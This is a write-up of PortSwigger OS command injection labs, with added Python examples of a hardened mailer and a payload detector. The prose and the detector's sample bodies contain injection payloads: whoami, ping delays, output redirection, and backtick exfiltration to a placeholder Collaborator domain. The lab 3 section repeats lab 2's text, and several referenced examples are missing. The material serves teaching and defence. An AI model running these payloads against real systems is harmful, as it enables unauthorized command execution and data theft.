Command Injection Labs
LAB #1: OS command injection - a simple case
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-simple
Objective: Execute the whoami command to determine the name of the current user.
This lab contains a shopping application with a number of products for purchase. Each product has a Check Stock function that shows whether the product is in stock.
To check stock, the application sends a POST request to the /product/stock endpoint with the following parameters.
If we change the productID parameter to %26whoami|| we can successfully execute shell commands.
LAB #2: Blind OS command injection with time delays
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays
Objective: Exploit the blind OS command injection to cause a 10-second delay.
This lab contains a shopping application with a number of products for purchase. The site also has a submit-feedback function at /feedback/submit. We can submit feedback using a POST request with the parameters csrf, name, email, subject, and message. This request looks like the following.
If we change the email parameter like the following, we will see a delay of a certain number of seconds in the response.
There we use || to break out of the shell command, then add a ping command to localhost that sends the requested number of pings (one per second, which produces the delay), and then separate the remaining command with another ||.
They use OS-native email functionality to send an email that takes the email and subject like this.
They add our user-supplied email into the shell command without any validation, so the above shell command becomes like this.
LAB #3: Blind OS command injection with output redirection
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection
Objective: Execute the whoami command and retrieve its output.
This lab contains a shopping application with a number of products for purchase. The site also has a submit-feedback function at /feedback/submit. We can submit feedback using a POST request with the parameters csrf, name, email, subject, and message. This request looks like the following.
If we change the email parameter like the following, we will see a delay of a certain number of seconds in the response.
There we use || to break out of the shell command, then add a ping command that sends the requested number of pings to localhost (one per second, which produces the delay), and then separate the remaining command with another ||.
They use OS-native email functionality to send an email that takes the email and subject like this.
They add our user-supplied email into the shell command without any validation, so the above shell command becomes like this.
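The mailer pattern described for labs 2 and 3 above, as an added example that is not the lab's own code: a Python model of the vulnerable string-built command beside a hardened version that validates the address against an allowlist and hands an argument vector to the process without a shell. The mail command line, the regex and the sample payload are assumptions made for illustration.

```python
import re
import subprocess
from typing import List, Optional

# Added example, not the lab's own code: it models the feedback mailer the
# write-up describes, where the user-supplied email is interpolated into a
# shell command line without validation, and shows the hardened form.

# Constructed sample of the time-delay payload shape used in the write-up.
SAMPLE_PAYLOAD = "x||ping -c 10 127.0.0.1||"

def build_mail_command_vulnerable(email: str, subject: str) -> str:
    """Vulnerable pattern: concatenating untrusted input into one command
    string destined for subprocess.run(..., shell=True). The string is only
    built here, not executed, so the injected operators can be inspected."""
    return f"mail -s '{subject}' {email}"

# Allowlist for the address. Assumption: the form only needs plain addresses
# (local part, '@', dot-separated labels). Nothing in these classes is a shell
# operator, so '|', '&', ';', '>' and backticks are rejected outright.
EMAIL_RE = re.compile(
    r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]{1,63}(\.[A-Za-z0-9-]{1,63})+$"
)

def is_safe_email(email: str) -> bool:
    return EMAIL_RE.fullmatch(email) is not None

def build_mail_argv_hardened(email: str, subject: str) -> Optional[List[str]]:
    """Hardened pattern: validate first, then build an argument vector.
    Returns None for a rejected address. With shell=False each element reaches
    execve(2) as one argv entry, so even the free-text subject can hold any
    character without it ever being parsed as a shell operator."""
    if not is_safe_email(email):
        return None
    return ["mail", "-s", subject, email]

def send_feedback_hardened(email: str, subject: str) -> Optional[int]:
    """Runs the mailer without a shell and returns its exit status, or None if
    the address was rejected. Needs a local mail binary, so the checks that
    accompany this example only exercise the builders."""
    argv = build_mail_argv_hardened(email, subject)
    if argv is None:
        return None
    return subprocess.run(argv, check=False).returncode
```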
Having confirmed a blind command injection, we can run any command and redirect its output to a file in a web-readable directory, then read that file by visiting its URL in the browser. The steps look like the following.
We use the following command in the email parameter.
This executes whoami, the command that prints the name of the current user, and then the output redirector > writes the command's output to the file path we supplied, /var/www/images/whoami.txt. Here whoami.txt is the file that is created and contains the output of the whoami command.
As we know, the site uses the following URL to fetch images.
We can use that to retrieve the whoami.txt file like the following.
LAB #4: Blind OS command injection with out-of-band interaction
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band
Objective: Exploit OS command injection to issue a DNS lookup to Burp Collaborator
This lab contains a shopping application with a number of products for purchase. The site also has a submit-feedback function at /feedback/submit. We can submit feedback using a POST request with the parameters csrf, name, email, subject, and message. This request looks like the following.
If we change the email parameter like the following, we will not see any time delay in the response, but if we supply a Burp Collaborator domain like this, we will see an out-of-band interaction.
LAB #5: Blind OS command injection with out-of-band data exfiltration
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration
Objective: Exploit OS command injection to perform an out-of-band interaction that exfiltrates the output of the whoami command.
This lab contains a shopping application with a number of products for purchase. The site also has a submit-feedback function at /feedback/submit. We can submit feedback using a POST request with the parameters csrf, name, email, subject, and message. This request looks like the following.
If we change the email parameter like the following, we will not see any time delay in the response, but if we supply a Burp Collaborator domain like this, we will see an out-of-band interaction.
Knowing there is a command injection vulnerability, we can exfiltrate data like the following.
There we use backticks to run an inline shell command and append its output to our Burp Collaborator subdomain. When the command runs, the username of the current user appears as part of the domain name in our Burp Collaborator logs, like the following.
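As an added example, not part of this write-up: a small Python detector run over constructed form bodies in the payload shapes used in labs 1 through 5 (encoded &, ||, > redirection and backticks), showing why parameter values must be inspected after URL decoding rather than before splitting. The endpoints are the ones named above; the bodies, the COLLABORATOR_PLACEHOLDER domain and the command list are constructed assumptions.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Added example, not part of the write-up: a detector for the payload shapes
# these labs use, run over constructed form bodies rather than captured
# traffic. Values are inspected after URL decoding, so the %26 of lab 1 is
# seen as the '&' it becomes on the server.

# Shell operators the labs rely on ('||', '&', '>', backticks, $( )) and the
# commands the write-up names; the latter only enrich a finding.
SHELL_META = re.compile(r"(\|\||&&|[|&;`>]|\$\()")
KNOWN_COMMANDS = re.compile(r"\b(whoami|ping|nslookup|sleep)\b")

# Constructed sample bodies; COLLABORATOR_PLACEHOLDER stands in for a domain.
SAMPLE_BODIES = [
    ("/product/stock", "productID=1&storeId=1"),
    ("/product/stock", "productID=1%26whoami||&storeId=1"),
    ("/feedback/submit", "csrf=t&name=a&email=x||ping+-c+10+127.0.0.1||&subject=s&message=m"),
    ("/feedback/submit", "csrf=t&name=a&email=x||whoami>/var/www/images/whoami.txt||&subject=s&message=m"),
    ("/feedback/submit", "csrf=t&name=a&email=x||nslookup+`whoami`.COLLABORATOR_PLACEHOLDER||&subject=s&message=m"),
    ("/feedback/submit", "csrf=t&name=a&email=user@example.com&subject=s&message=m"),
]

def inspect_value(name: str, value: str) -> Optional[Dict]:
    """Returns a finding when a decoded parameter value carries a shell
    operator; benign values return None."""
    ops = sorted(set(SHELL_META.findall(value)))
    if not ops:
        return None
    cmds = sorted(set(KNOWN_COMMANDS.findall(value)))
    return {"param": name, "operators": ops, "commands": cmds}

def scan_body(path: str, body: str) -> List[Dict]:
    """parse_qs splits on the raw '&' first and decodes each value afterwards,
    so an encoded %26 inside a value survives as a literal '&' in that value
    instead of starting a new parameter; decoding first would hide it."""
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            finding = inspect_value(name, value)
            if finding:
                finding["path"] = path
                findings.append(finding)
    return findings

def scan_all(bodies=SAMPLE_BODIES) -> List[Dict]:
    return [f for path, body in bodies for f in scan_body(path, body)]
```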